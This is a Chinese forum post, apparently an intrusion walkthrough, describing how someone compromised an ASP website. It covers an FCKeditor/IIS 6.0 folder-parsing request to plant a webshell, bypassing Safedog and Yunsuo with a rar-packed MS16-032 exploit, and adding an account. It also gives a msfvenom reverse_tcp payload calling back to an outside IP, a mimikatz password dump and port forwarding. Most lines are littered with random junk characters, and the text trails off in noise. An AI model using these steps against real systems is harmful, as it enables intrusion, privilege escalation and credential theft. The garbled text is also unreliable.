|
7 Y: _# Q3 k/ x( Q: Z j) C
5 ]+ c) ^: E8 X: h , V* E% x+ P6 A# R
7 f& O! m5 m( t+ E* w
|
! ~1 U# I7 h+ [ y) f 3 I# a3 M- Z7 Q5 e* ?8 _6 v
2 ]2 y2 a8 }4 n* G6 w2 _: L8 r一、 利用getwebshell篇
6 ]! M8 ~& S( l% P9 l' U9 {
1 T9 C7 A4 I. o" k2 ~# |首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ `! U6 L: e, ^: P- k
: Y! R- O7 M9 _ 6 h; ^" _) h' v
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) ' Y# c3 c$ l j! e* b' r% n
 4 Z Y* R E1 f- `; \. f0 i
下面我们构造一个asp目录,如:
# N9 `+ I' i! i$ \ E' Q 1 G9 x# U4 o5 P8 ~
9 w6 u0 }! g" L
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
9 n! X1 B, p0 ^, X5 K L , Q0 _, m* J2 r% q8 p/ U. D4 |
h( p- s' X7 H: c; Y6 k5 n( S 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
: n& x8 g; V0 `3 y* L! T : Q+ X" R+ A1 [/ b7 N: o
一、 绕过安全狗云锁提权并且加账号 : \7 L. a7 L5 x F) d' r3 R
 ' V& e/ f U, i" A; z! {
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 7 s! l# O$ P" |8 U+ G0 c' ^5 |* Z
# q$ ?: G: S( {
如图: 6 X- l/ r# {# M p7 ^0 y
 1 l( ?6 D- p q, n
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit 5 E+ |3 ]1 x m: ], U& H. m# h
4 n; V1 W$ M. s( }3 t- e' c5 p6 L( g
一、 利用metasploit ! h, V; l3 g3 \8 d% G" o' }
: T% @+ N3 [( N3 W2 C首先用pentestbox生成一个64位的payload如下命令
( G, `0 w7 b4 O0 n3 M* b" P
K7 v& i" o5 ~% U5 CmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
C+ Q: z( [# `( Q 9 e! \" ]# L/ L: Q- ]9 T# @& U% U
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 J) h* g/ M$ B3 {6 L! a
1 }+ e& E3 P) O& c下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: ( E3 ~5 N5 Y; i- o( b' o# y, t; L. o$ W
 ; C1 y$ Q/ X. D! l R
下面我们来做一个监听如下命令:
7 {$ d5 g- ?! V" p
7 b `$ w& @# U, gportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: # X, R+ O* P6 Y$ ?" N/ B$ K" c
D- J: O# ^% s. s6 w- R; ?# D
Z d) a X' @6 i; @" s% s |
) X2 D J+ \2 y7 F$ r- k. i
0 A6 R& H8 ^# g3 f7 U
- h- @) h- _7 C/ L4 b* v 6 _" ^- b" y' l, P- P, G/ c
, |, Y% b# O; |8 s. o* N
+ ~0 P4 Y- y3 w5 _: n1 `9 e 1 {& r8 ^2 M% E" R
- Q! X+ z3 [& o) _. A
; D; r) t; Q2 X5 L8 L( v8 z# y/ X
$ t/ p% ]+ W- [3 j
; p- w/ ?5 b/ E$ T+ \1 B 3 U% j' @( e: `0 q
, B' L$ d' e6 W! f" ?: A
4 x1 c0 R& [1 Q d4 Z+ N |